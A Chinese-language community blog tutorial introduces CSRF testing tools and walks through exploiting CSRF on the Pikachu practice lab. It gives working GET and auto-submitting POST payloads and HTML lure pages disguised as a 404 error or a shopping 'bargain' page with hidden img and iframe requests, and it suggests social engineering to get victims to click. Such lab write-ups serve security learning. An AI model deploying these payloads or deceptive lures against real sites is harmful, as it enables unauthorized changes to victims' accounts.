CSRF工具使用、利用过程

举报
黑色地带(崛起) 发表于 2023/02/16 15:33:05 2023/02/16
【摘要】 CSRF工具使用、利用过程

CSRF工具使用、利用过程

 工具使用:

deemon

 下载地址:

链接地址:Deemon is a tool to detect CSRF in web applications(github.com)


简介:

这是Deemon的代码库,一个用于在Web应用程序中检测CSRF的工具。 Deemon是一种应用程序无关的自动框架,旨在由开发人员和安全分析师在软件开发生命周期的安全测试阶段使用。当前版本的Deemon支持使用MySQL数据库的基于PHP的Web应用程序



CSRFTester

简介:

CSRFTester是一款CSRF漏洞的测试工具.运行在windows上。


下载链接:

链接:https://pan.baidu.com/s/1zHV1qwXwviOS29akrbODbA?pwd=hj12 
提取码:hj12



基本使用方法:

第一步:配置本地服务器的代理监听


 编辑


第二步:开始记录 

编辑


编辑



利用过程:

CSRF(GET)

 第一步:模拟用户(目标)登录

编辑


尝试修改个人信息

编辑


编辑

 在开发者模式中的网络中可以看见修改提交的URL

编辑


第二步:获取修改提交的URL

这个可以先自己提交的时候,然后找找提交修改的URL规律

不行的话,就结合xss等手段


第三步:构造恶意执行语句

http://localhost:8080/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=女&phonenum=12124123123&add=广州&email=123456qq.com&submit=submit


第四步:将构造的URL诱骗用户点击

在同一浏览器中打开这个URL将执行修改操作 

http://localhost:8080/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=女&phonenum=12124123123&add=北京&email=123456qq.com&submit=submit

编辑



更多其他的伪装方法:

写入html文件中,诱骗用户点击,并使用各种提示打消用户的疑虑

 //①伪装成错误页面(即404页面)

<html>
<head>
        <title>
            页面找不到
        </title>
</head>
<body>
<img src="http://localhost:8080/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=女&phonenum=12124123123&add=北京&email=123456qq.com&submit=submit" border="0"style="display:none;"/>
 
<h1>404<h1>
<h2>file not found.<h2>
</body>
</html>


//②使用嵌套,让用户不易发现

duoduo.html

<html>
	<head>
		<title>
			某多多在线砍一刀
		</title>
	</head>
	<body>
		<a href="post.html">在线机器人帮助砍一刀,点击砍取!!!</a>
	</body>
</html>

post.html

<html>
	<head>
		<title>
			某多多助手
		</title>
	</head>
	<body>
		<p>请到某多多中查看砍一刀是否成功</p>
		<iframe/ src="http://localhost:8080/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=女&phonenum=12124123123&add=北京&email=123456qq.com&submit=submit" frameborder="0" width="0px">
	</body>
</html>


编辑


CSRF(POST)

 第一步:是要获得用户修改提交的URL

这个可以自己先提交一遍,尝试能不能分析出,不行就尝试社工

编辑




第二步:构造恶意执行语句


<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://localhost:8080/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php">
    <input id="sex" type="text" name="sex" value="girl" />
    <input id="phonenum" type="text" name="phonenum" value="1111111" />
    <input id="add" type="text" name="add" value="广州" />
    <input id="email" type="text" name="email" value="111111111" />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>



第三步:诱导用户点击

就已经执行了修改操作了

编辑



【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。